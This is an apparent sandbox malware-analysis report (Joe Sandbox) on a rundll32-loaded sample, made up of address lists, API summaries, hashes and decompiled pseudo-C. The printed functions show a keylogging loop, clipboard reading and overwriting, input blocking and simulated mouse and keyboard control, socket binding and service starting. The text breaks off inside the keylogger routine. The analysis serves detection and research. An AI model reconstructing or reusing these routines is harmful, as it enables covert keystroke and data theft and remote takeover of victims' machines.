                                                                                              0x04274017
                                                                                              0x0427401b
                                                                                              0x04274021
                                                                                              0x04274024
                                                                                              0x04274071
                                                                                              0x04274075
                                                                                              0x04274026
                                                                                              0x04274026
                                                                                              0x04274028
                                                                                              0x0427402b
                                                                                              0x0427402d
                                                                                              0x04274078
                                                                                              0x04274078
                                                                                              0x0427407d
                                                                                              0x04274082
                                                                                              0x04274083
                                                                                              0x04274084
                                                                                              0x04274085
                                                                                              0x04274086
                                                                                              0x04274087
                                                                                              0x04274088
                                                                                              0x04274089
                                                                                              0x0427408a
                                                                                              0x0427408b
                                                                                              0x0427408c
                                                                                              0x0427408d
                                                                                              0x0427408e
                                                                                              0x0427408f
                                                                                              0x04274090
                                                                                              0x04274091
                                                                                              0x04274093
                                                                                              0x04274096
                                                                                              0x0427409d
                                                                                              0x042740a3
                                                                                              0x042740a4
                                                                                              0x042740a5
                                                                                              0x042740ab
                                                                                              0x042740ac
                                                                                              0x042740ae
                                                                                              0x042740b4
                                                                                              0x042740c1
                                                                                              0x042740c4
                                                                                              0x042740d0
                                                                                              0x042740d2
                                                                                              0x04274105
                                                                                              0x042740d4
                                                                                              0x042740d4
                                                                                              0x042740ec
                                                                                              0x042740f4
                                                                                              0x042740f7
                                                                                              0x042740fa
                                                                                              0x042740fd
                                                                                              0x04274100
                                                                                              0x04274100
                                                                                              0x04274108
                                                                                              0x0427410b
                                                                                              0x04274110
                                                                                              0x04274113
                                                                                              0x04274116
                                                                                              0x0427411d
                                                                                              0x04274127
                                                                                              0x0427412f
                                                                                              0x04274131
                                                                                              0x04274131
                                                                                              0x04274135
                                                                                              0x0427413b
                                                                                              0x04274142
                                                                                              0x04274149
                                                                                              0x0427414e
                                                                                              0x04274151
                                                                                              0x04274155
                                                                                              0x042741bb
                                                                                              0x042741c8
                                                                                              0x042741cc
                                                                                              0x042741d7
                                                                                              0x042741dd
                                                                                              0x042741e0
                                                                                              0x04274253
                                                                                              0x00000000
                                                                                              0x042741e2
                                                                                              0x042741e2
                                                                                              0x042741e5
                                                                                              0x042741f8
                                                                                              0x042741fe
                                                                                              0x04274200
                                                                                              0x00000000
                                                                                              0x04274206
                                                                                              0x04274214
                                                                                              0x0427421a
                                                                                              0x0427421c
                                                                                              0x00000000
                                                                                              0x0427421e
                                                                                              0x04274222
                                                                                              0x04274229
                                                                                              0x0427422e
                                                                                              0x04274231
                                                                                              0x04274241
                                                                                              0x04274247
                                                                                              0x0427424e
                                                                                              0x00000000
                                                                                              0x04274233
                                                                                              0x04274238
                                                                                              0x0427423d
                                                                                              0x0427423d
                                                                                              0x04274231
                                                                                              0x00000000
                                                                                              0x0427421c
                                                                                              0x04274200
                                                                                              0x04274157
                                                                                              0x04274157
                                                                                              0x0427415a
                                                                                              0x0427416d
                                                                                              0x04274173
                                                                                              0x04274175
                                                                                              0x042742b4
                                                                                              0x042742b9
                                                                                              0x042742be
                                                                                              0x042742c3
                                                                                              0x042742c8
                                                                                              0x042742c9
                                                                                              0x042742ca
                                                                                              0x042742cb
                                                                                              0x042742cc
                                                                                              0x042742cd
                                                                                              0x042742ce
                                                                                              0x042742cf
                                                                                              0x042742d1
                                                                                              0x042742d6
                                                                                              0x042742dd
                                                                                              0x042742e0
                                                                                              0x042742e3
                                                                                              0x042742e9
                                                                                              0x042742ec
                                                                                              0x042742f4
                                                                                              0x042742fa
                                                                                              0x04274303
                                                                                              0x04274309
                                                                                              0x04274314
                                                                                              0x0427417b
                                                                                              0x04274189
                                                                                              0x0427418f
                                                                                              0x04274191
                                                                                              0x042741b0
                                                                                              0x042741b0
                                                                                              0x04274193
                                                                                              0x042741a3
                                                                                              0x042741a8
                                                                                              0x04274259
                                                                                              0x04274259
                                                                                              0x0427425e
                                                                                              0x0427425e
                                                                                              0x04274261
                                                                                              0x04274263
                                                                                              0x04274265
                                                                                              0x04274267
                                                                                              0x04274275
                                                                                              0x04274281
                                                                                              0x04274286
                                                                                              0x04274288
                                                                                              0x04274291
                                                                                              0x04274291
                                                                                              0x04274288
                                                                                              0x04274267
                                                                                              0x04274298
                                                                                              0x042742a4
                                                                                              0x042742b1
                                                                                              0x042742b1
                                                                                              0x04274175
                                                                                              0x0427402f
                                                                                              0x04274034
                                                                                              0x04274037
                                                                                              0x04274039
                                                                                              0x0427403d
                                                                                              0x0427403f
                                                                                              0x00000000
                                                                                              0x04274041
                                                                                              0x04274041
                                                                                              0x04274045
                                                                                              0x00000000
                                                                                              0x04274047
                                                                                              0x04274047
                                                                                              0x0427404a
                                                                                              0x0427404f
                                                                                              0x04274054
                                                                                              0x04274056
                                                                                              0x00000000
                                                                                              0x04274058
                                                                                              0x04274058
                                                                                              0x0427405f
                                                                                              0x04274067
                                                                                              0x0427406c
                                                                                              0x0427406c
                                                                                              0x04274056
                                                                                              0x04274045
                                                                                              0x0427403f
                                                                                              0x0427402d
                                                                                              0x04273ffe
                                                                                              0x04274007
                                                                                              0x04274007
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04273ee7
                                                                                              0x04273ee2
                                                                                              0x04273e6c
                                                                                              0x04273e6c
                                                                                              0x04273f9f
                                                                                              0x04273f9f
                                                                                              0x04273fa1
                                                                                              0x00000000
                                                                                              0x04273fa1
                                                                                              0x04273e6a
                                                                                              0x04273e47
                                                                                              0x04273e04
                                                                                              0x04273e04
                                                                                              0x04273e08
                                                                                              0x00000000
                                                                                              0x04273e0a
                                                                                              0x04273e0f
                                                                                              0x04273e16
                                                                                              0x04273e20
                                                                                              0x04273e25
                                                                                              0x04273e2a
                                                                                              0x04273e2d
                                                                                              0x04273e2f
                                                                                              0x00000000
                                                                                              0x04273e31
                                                                                              0x04273e31
                                                                                              0x00000000
                                                                                              0x04273e31
                                                                                              0x04273e2f
                                                                                              0x04273e08
                                                                                              0x04273df3
                                                                                              0x04273fa3
                                                                                              0x04273fb6
                                                                                              0x04273fb6

                                                                                              APIs
                                                                                                • Part of subcall function 0426D020: StrChrW.SHLWAPI(?,0000003A), ref: 0426D044
                                                                                                • Part of subcall function 0426D0D0: WSASetLastError.WS2_32(00002741), ref: 0426D0FA
                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,04273D36,?,?,?,?,FFFFFFFF,?), ref: 04273E31
                                                                                              • socket.WS2_32(00000000,00000001,00000006), ref: 04273E5A
                                                                                              • WSAGetLastError.WS2_32 ref: 04273E6C
                                                                                                • Part of subcall function 0426D0D0: WSAStringToAddressW.WS2_32(?,?,00000000,?,?), ref: 0426D12F
                                                                                                • Part of subcall function 0426D0D0: htons.WS2_32 ref: 0426D13F
                                                                                              • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,FFFFFFFF,00000000,00000000), ref: 04273ECC
                                                                                              • WSAGetLastError.WS2_32 ref: 04273ED7
                                                                                              • bind.WS2_32(?,00000002,0000001C), ref: 04273F8D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$AddressIoctlStringbindhtonssocket
                                                                                              • String ID:
                                                                                              • API String ID: 1590887309-0
                                                                                              • Opcode ID: ef7f2bcd63c8fcafef7a666003ff467f93e8269e5135b9998b79fc2f7731b809
                                                                                              • Instruction ID: efc535b63ca04ba852e6a4a389bb06678ae79cf778784b62b1696cfc97d12759
                                                                                              • Opcode Fuzzy Hash: ef7f2bcd63c8fcafef7a666003ff467f93e8269e5135b9998b79fc2f7731b809
                                                                                              • Instruction Fuzzy Hash: C4619371B202059BEB10DFA8E884BAE73B5EF44350F14422AFD15D7290EBB4ED80DB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 04265570: GetCurrentThreadId.KERNEL32 ref: 04265588
                                                                                                • Part of subcall function 04265570: GetThreadDesktop.USER32(00000000), ref: 0426558F
                                                                                                • Part of subcall function 04265570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 042655CF
                                                                                                • Part of subcall function 04265570: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 042655DA
                                                                                                • Part of subcall function 04265570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0426560E
                                                                                                • Part of subcall function 04265570: lstrcmpi.KERNEL32(?,?), ref: 0426561E
                                                                                                • Part of subcall function 04265570: SetThreadDesktop.USER32(00000000), ref: 04265629
                                                                                                • Part of subcall function 04265570: CloseDesktop.USER32(?), ref: 0426563D
                                                                                                • Part of subcall function 04265570: CloseDesktop.USER32(00000000), ref: 04265640
                                                                                              • SetCursorPos.USER32(?,7497ADB0), ref: 04262127
                                                                                              • WindowFromPoint.USER32(?,7497ADB0,?,?,?,?,?,04261DC9,?,?), ref: 0426212F
                                                                                              • SetCapture.USER32(00000000,?,?,?,?,?,04261DC9,?,?), ref: 04262136
                                                                                              • keybd_event.USER32(00000000,00000000), ref: 0426217B
                                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0426222C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Desktop$Thread$CloseInformationObjectUser$CaptureCurrentCursorFromInputOpenPointWindowkeybd_eventlstrcmpimouse_event
                                                                                              • String ID:
                                                                                              • API String ID: 3538182014-0
                                                                                              • Opcode ID: eead6bb8430db7224b396e60e05d9bb13bdbbf98acd4b540a5a4c5f95c5e14f1
                                                                                              • Instruction ID: 38c84280bc766075e9525dd1be3ec1ce643e0185c3fc277f655280e4b439a8c1
                                                                                              • Opcode Fuzzy Hash: eead6bb8430db7224b396e60e05d9bb13bdbbf98acd4b540a5a4c5f95c5e14f1
                                                                                              • Instruction Fuzzy Hash: C751B3317E4300FAF731AA68AC4BF167A55DB45F14F214292FB02BF1C5DAE4B880C668
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 48%
                                                                                              			E04257510(intOrPtr __ecx) {
                                                                                              				void* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* __esi;
                                                                                              				int _t9;
                                                                                              				void* _t12;
                                                                                              				void* _t20;
                                                                                              				void* _t24;
                                                                                              				void* _t28;
                                                                                              				void* _t30;
                                                                                              				char* _t31;
                                                                                              
                                                                                              				_t22 = __ecx;
                                                                                              				_v12 = __ecx;
                                                                                              				_t9 = OpenClipboard(0);
                                                                                              				if(_t9 == 0) {
                                                                                              					return _t9;
                                                                                              				}
                                                                                              				if(IsClipboardFormatAvailable(0xd) != 0) {
                                                                                              					_t12 = GetClipboardData(0xd);
                                                                                              					_t20 = _t12;
                                                                                              					if(_t20 != 0) {
                                                                                              						GlobalFix(_t20);
                                                                                              						_v8 = _t12;
                                                                                              						_t39 = _t12;
                                                                                              						if(_t12 != 0) {
                                                                                              							_push(_t30);
                                                                                              							_t3 = GlobalSize(_t20) + 1; // 0x1
                                                                                              							_t28 = _t3;
                                                                                              							_push(_t28);
                                                                                              							_t31 = E04275B55(_t22, _t30, _t39);
                                                                                              							_t4 = _t28 - 1; // 0x0
                                                                                              							_t6 = _t31 + 1; // 0x1
                                                                                              							_t24 = _t6;
                                                                                              							 *_t31 = 0x79;
                                                                                              							E0427E060(_t24, _v8, _t4);
                                                                                              							GlobalUnWire(_t20);
                                                                                              							_push(_t24);
                                                                                              							_push(0x3f);
                                                                                              							_push(_t28);
                                                                                              							_push(_t31);
                                                                                              							E04251C60( *((intOrPtr*)(_v12 + 4)));
                                                                                              							E04275B0F(_t31);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return CloseClipboard();
                                                                                              			}













                                                                                              0x04257510
                                                                                              0x04257518
                                                                                              0x0425751b
                                                                                              0x04257523
                                                                                              0x042575a4
                                                                                              0x042575a4
                                                                                              0x0425752f
                                                                                              0x04257534
                                                                                              0x0425753a
                                                                                              0x0425753e
                                                                                              0x04257541
                                                                                              0x04257547
                                                                                              0x0425754a
                                                                                              0x0425754c
                                                                                              0x0425754e
                                                                                              0x04257557
                                                                                              0x04257557
                                                                                              0x0425755a
                                                                                              0x04257560
                                                                                              0x04257562
                                                                                              0x04257569
                                                                                              0x04257569
                                                                                              0x0425756c
                                                                                              0x04257570
                                                                                              0x04257579
                                                                                              0x0425757f
                                                                                              0x04257583
                                                                                              0x04257585
                                                                                              0x04257586
                                                                                              0x0425758a
                                                                                              0x04257590
                                                                                              0x04257599
                                                                                              0x0425754c
                                                                                              0x0425759a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • OpenClipboard.USER32(00000000), ref: 0425751B
                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 04257527
                                                                                              • GetClipboardData.USER32(0000000D), ref: 04257534
                                                                                              • GlobalFix.KERNEL32(00000000), ref: 04257541
                                                                                              • GlobalSize.KERNEL32(00000000), ref: 04257551
                                                                                              • GlobalUnWire.KERNEL32(00000000), ref: 04257579
                                                                                              • CloseClipboard.USER32 ref: 0425759B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$AvailableCloseDataFormatOpenSizeWire
                                                                                              • String ID:
                                                                                              • API String ID: 339718915-0
                                                                                              • Opcode ID: 80d733a3ba4066f0e0f6001b83a339edc51925841410fe875393d5213c0638f1
                                                                                              • Instruction ID: 8ea55137bdd90e5fda6261168cb49037a9c2cb52cc35c41b312f4f035f4f843a
                                                                                              • Opcode Fuzzy Hash: 80d733a3ba4066f0e0f6001b83a339edc51925841410fe875393d5213c0638f1
                                                                                              • Instruction Fuzzy Hash: B611C275B54306BBD7246BB4AC8CB6A7B6CEF84349F000069F90AA2181EE35ED05C660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E042574B0(intOrPtr _a4, long _a8) {
                                                                                              				int _t4;
                                                                                              				void* _t6;
                                                                                              				void* _t12;
                                                                                              
                                                                                              				_t4 = OpenClipboard(0);
                                                                                              				if(_t4 == 0) {
                                                                                              					return _t4;
                                                                                              				}
                                                                                              				EmptyClipboard();
                                                                                              				_t6 = GlobalAlloc(2, _a8);
                                                                                              				_t12 = _t6;
                                                                                              				if(_t12 != 0) {
                                                                                              					GlobalFix(_t12);
                                                                                              					if(_t6 != 0) {
                                                                                              						E0427E060(_t6, _a4, _a8);
                                                                                              						GlobalUnWire(_t12);
                                                                                              						SetClipboardData(0xd, _t12);
                                                                                              					}
                                                                                              				}
                                                                                              				return CloseClipboard();
                                                                                              			}






                                                                                              0x042574b5
                                                                                              0x042574bd
                                                                                              0x04257509
                                                                                              0x04257509
                                                                                              0x042574c0
                                                                                              0x042574cb
                                                                                              0x042574d1
                                                                                              0x042574d5
                                                                                              0x042574d8
                                                                                              0x042574e0
                                                                                              0x042574e9
                                                                                              0x042574f2
                                                                                              0x042574fb
                                                                                              0x042574fb
                                                                                              0x042574e0
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • OpenClipboard.USER32(00000000), ref: 042574B5
                                                                                              • EmptyClipboard.USER32 ref: 042574C0
                                                                                              • GlobalAlloc.KERNEL32(00000002,?,?,?,04256D8A,?,?), ref: 042574CB
                                                                                              • GlobalFix.KERNEL32(00000000), ref: 042574D8
                                                                                              • GlobalUnWire.KERNEL32(00000000), ref: 042574F2
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 042574FB
                                                                                              • CloseClipboard.USER32 ref: 04257501
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$AllocCloseDataEmptyOpenWire
                                                                                              • String ID:
                                                                                              • API String ID: 2050416147-0
                                                                                              • Opcode ID: 8dad1eb76365a1a1027bd3a3237f9be972cda19de948fa13ef3f93f0c82e4006
                                                                                              • Instruction ID: 46ecca740999b48273d707789a905de755de30f810f73efbc419d038e9618f75
                                                                                              • Opcode Fuzzy Hash: 8dad1eb76365a1a1027bd3a3237f9be972cda19de948fa13ef3f93f0c82e4006
                                                                                              • Instruction Fuzzy Hash: 1EF08C32755225ABCB123BA8BC0CB9E3B2CFF0479AF004010FE0995150DF399E12CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E04263750(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v32;
                                                                                              				struct _SERVICE_STATUS _v36;
                                                                                              				signed int _t5;
                                                                                              				void* _t17;
                                                                                              				short* _t23;
                                                                                              				void* _t24;
                                                                                              				signed int _t27;
                                                                                              
                                                                                              				_t5 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t5 ^ _t27;
                                                                                              				_t23 = __ecx;
                                                                                              				_t17 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                              				if(_t17 != 0) {
                                                                                              					_t24 = OpenServiceW(_t17, _t23, 0x14);
                                                                                              					if(_t24 != 0) {
                                                                                              						if(QueryServiceStatus(_t24,  &_v36) != 0) {
                                                                                              							if(_v32 != 4) {
                                                                                              								StartServiceW(_t24, 0, 0);
                                                                                              								_t26 =  !=  ? 1 : 0;
                                                                                              							}
                                                                                              						}
                                                                                              						CloseServiceHandle(_t24);
                                                                                              					}
                                                                                              					CloseServiceHandle(_t17);
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t27);
                                                                                              			}











                                                                                              0x04263756
                                                                                              0x0426375d
                                                                                              0x0426376a
                                                                                              0x04263774
                                                                                              0x04263778
                                                                                              0x04263784
                                                                                              0x04263788
                                                                                              0x04263797
                                                                                              0x0426379d
                                                                                              0x042637ab
                                                                                              0x042637b8
                                                                                              0x042637b8
                                                                                              0x0426379d
                                                                                              0x042637bc
                                                                                              0x042637bc
                                                                                              0x042637c3
                                                                                              0x042637c3
                                                                                              0x042637db

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0426376E
                                                                                              • OpenServiceW.ADVAPI32(00000000,?,00000014), ref: 0426377E
                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?), ref: 0426378F
                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 042637AB
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 042637BC
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 042637C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandleOpen$ManagerQueryStartStatus
                                                                                              • String ID:
                                                                                              • API String ID: 2710452061-0
                                                                                              • Opcode ID: 910703153b440837c1315d2bdd8003f26c197fc242b60b794feccefcf2ea878a
                                                                                              • Instruction ID: a9b544a3b4e3185fcccb6c08c99000f68defc2591a8d780d48f3b4186f5236e2
                                                                                              • Opcode Fuzzy Hash: 910703153b440837c1315d2bdd8003f26c197fc242b60b794feccefcf2ea878a
                                                                                              • Instruction Fuzzy Hash: 5F01F932705214BBE715AA69AC8DF7B7ABCDB85B55F000069FD07D2141DE78EC4586A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 60%
                                                                                              			E04261D40(void* __ecx, void* __esi, signed char* _a4, signed int _a8) {
                                                                                              				void* _t23;
                                                                                              
                                                                                              				_t23 = ( *_a4 & 0x000000ff) + 0xffffffeb;
                                                                                              				if(_t23 > 0x63) {
                                                                                              					L13:
                                                                                              					return _t23;
                                                                                              				} else {
                                                                                              					switch( *((intOrPtr*)(( *(_t23 + 0x4261e6c) & 0x000000ff) * 4 +  &M04261E3C))) {
                                                                                              						case 0:
                                                                                              							__eax =  *(__ebx + 1) & 0x000000ff;
                                                                                              							return E04261C30(__ecx,  *(__ebx + 1) & 0x000000ff);
                                                                                              							goto L14;
                                                                                              						case 1:
                                                                                              							__al =  *(__ebx + 1);
                                                                                              							 *(__edi + 0x18) = __al;
                                                                                              							__al & 0x000000ff =  *(__edi + 0xb0);
                                                                                              							__eax =  *(__edi + 0xb0) + 4;
                                                                                              							__eflags = __eax;
                                                                                              							return __eax;
                                                                                              							goto L14;
                                                                                              						case 2:
                                                                                              							return E042656E0();
                                                                                              							goto L14;
                                                                                              						case 3:
                                                                                              							_push(0);
                                                                                              							__imp__BlockInput();
                                                                                              							__eax = _a8;
                                                                                              							__ecx = __edi;
                                                                                              							__eax = _a8 - 1;
                                                                                              							__eflags = _a8 - 1;
                                                                                              							__eax = __ebx + 1;
                                                                                              							__eax = E04262090(__ebx, __edi, __ebx + 1, __ebx + 1);
                                                                                              							_push( *(__edi + 0x10));
                                                                                              							__imp__BlockInput();
                                                                                              							return __eax;
                                                                                              							goto L14;
                                                                                              						case 4:
                                                                                              							__eax =  *(__ebx + 1) & 0x000000ff;
                                                                                              							_push(__eax);
                                                                                              							 *(__edi + 0x10) = __eax;
                                                                                              							__imp__BlockInput();
                                                                                              							return __eax;
                                                                                              							goto L14;
                                                                                              						case 5:
                                                                                              							__eax =  *(__ebx + 1) & 0x000000ff;
                                                                                              							 *(__edi + 0x14) = __eax;
                                                                                              							return __eax;
                                                                                              							goto L14;
                                                                                              						case 6:
                                                                                              							__eax =  *(__ebx + 1) & 0x000000ff;
                                                                                              							__ecx =  *(__edi + 0xb0);
                                                                                              							 *(__edi + 0x1c) =  *(__ebx + 1) & 0x000000ff;
                                                                                              							return E042629E0( *(__edi + 0xb0),  *(__ebx + 1) & 0x000000ff);
                                                                                              							goto L14;
                                                                                              						case 7:
                                                                                              							return E04257510(__ecx);
                                                                                              							goto L14;
                                                                                              						case 8:
                                                                                              							_a8 = _a8 - 1;
                                                                                              							__eflags = _a8 - 1;
                                                                                              							__eax = __ebx + 1;
                                                                                              							return E042574B0(__ebx + 1, __ebx + 1);
                                                                                              							goto L14;
                                                                                              						case 9:
                                                                                              							return SetEvent( *(__ecx + 8));
                                                                                              							goto L14;
                                                                                              						case 0xa:
                                                                                              							return E04261FE0(__ecx, __esi, __eflags);
                                                                                              						case 0xb:
                                                                                              							goto L13;
                                                                                              					}
                                                                                              				}
                                                                                              				L14:
                                                                                              			}




                                                                                              0x04261d4d
                                                                                              0x04261d53
                                                                                              0x04261e39
                                                                                              0x04261e39
                                                                                              0x04261d59
                                                                                              0x04261d60
                                                                                              0x00000000
                                                                                              0x04261d76
                                                                                              0x04261d83
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261d86
                                                                                              0x04261d89
                                                                                              0x04261d90
                                                                                              0x04261d96
                                                                                              0x04261d96
                                                                                              0x04261da3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261dae
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261db1
                                                                                              0x04261db3
                                                                                              0x04261db9
                                                                                              0x04261dbc
                                                                                              0x04261dbe
                                                                                              0x04261dbe
                                                                                              0x04261dc0
                                                                                              0x04261dc4
                                                                                              0x04261dc9
                                                                                              0x04261dcc
                                                                                              0x04261dd5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261dd8
                                                                                              0x04261ddc
                                                                                              0x04261ddd
                                                                                              0x04261de0
                                                                                              0x04261de9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261dec
                                                                                              0x04261df0
                                                                                              0x04261df6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261df9
                                                                                              0x04261dfd
                                                                                              0x04261e04
                                                                                              0x04261e0f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261e1a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261e20
                                                                                              0x04261e20
                                                                                              0x04261e22
                                                                                              0x04261e2e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261d73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04261d60
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: BlockInput$EventExchangeInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 2024910948-0
                                                                                              • Opcode ID: 63d5681a19f98184e48b6f500e3ea80016e88b802b9abb1618eb2087dcfca5b3
                                                                                              • Instruction ID: 1706a941e804e65510930da978e72b1c9604e8c8e2cd9c57c58c5d42e17b3572
                                                                                              • Opcode Fuzzy Hash: 63d5681a19f98184e48b6f500e3ea80016e88b802b9abb1618eb2087dcfca5b3
                                                                                              • Instruction Fuzzy Hash: B821B97B3081449FD7009FA9F884E6AF769FBE42357048167F509CA101C626E571D774
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • htons.WS2_32(?), ref: 0426DBDE
                                                                                              • bind.WS2_32(?,00000002,0000001C), ref: 0426DC02
                                                                                              • bind.WS2_32(?,?,00000010), ref: 0426DC42
                                                                                              • InterlockedIncrement.KERNEL32(042A7B58), ref: 0426DC6C
                                                                                              • InterlockedIncrement.KERNEL32(042A7B58), ref: 0426DC77
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: IncrementInterlockedbind$htons
                                                                                              • String ID:
                                                                                              • API String ID: 1901664375-0
                                                                                              • Opcode ID: 6c5a9230fa10ecb780db33c97b90e4a5913cbb4bafd0ae802547ee81de3cfcac
                                                                                              • Instruction ID: d4e740f83ca8b54293c66b3bd5840c1ff0c0564a0e55ae3e2cce4d6d7cee384f
                                                                                              • Opcode Fuzzy Hash: 6c5a9230fa10ecb780db33c97b90e4a5913cbb4bafd0ae802547ee81de3cfcac
                                                                                              • Instruction Fuzzy Hash: 6531C432B2011D9BDB14EF6CE884AAEB3A4FF95310F00422AEC0697190DBB4ACD09790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E0425B840() {
                                                                                              				signed int _t25;
                                                                                              				intOrPtr _t27;
                                                                                              				void* _t30;
                                                                                              				void* _t32;
                                                                                              				void* _t33;
                                                                                              
                                                                                              				_push(_t25);
                                                                                              				_t30 = GetAsyncKeyState;
                                                                                              				while(1) {
                                                                                              					Sleep(5);
                                                                                              					_t32 = 0;
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					do {
                                                                                              						_t1 = _t32 + 0x42a4768; // 0x30
                                                                                              						if((GetAsyncKeyState( *_t1 & 0x0000ffff) & 0x00000001) != 0) {
                                                                                              							_t25 = _t25 & 0xffffff00 | GetKeyState(0x10) < 0x00000000;
                                                                                              							if((GetKeyState(0x14) & 0xffffff00 | _t22 > 0x00000000) == 0) {
                                                                                              								if(_t25 == 0) {
                                                                                              									_t11 = _t32 + 0x42a476c; // 0x429e674
                                                                                              									_t27 =  *_t11;
                                                                                              								} else {
                                                                                              									_t10 = _t32 + 0x42a4770; // 0x429e76c
                                                                                              									_t27 =  *_t10;
                                                                                              								}
                                                                                              							} else {
                                                                                              								if(_t25 == 0) {
                                                                                              									_t9 = _t32 + 0x42a4774; // 0x429e674
                                                                                              									_t27 =  *_t9;
                                                                                              								} else {
                                                                                              									_t8 = _t32 + 0x42a4778; // 0x429e76c
                                                                                              									_t27 =  *_t8;
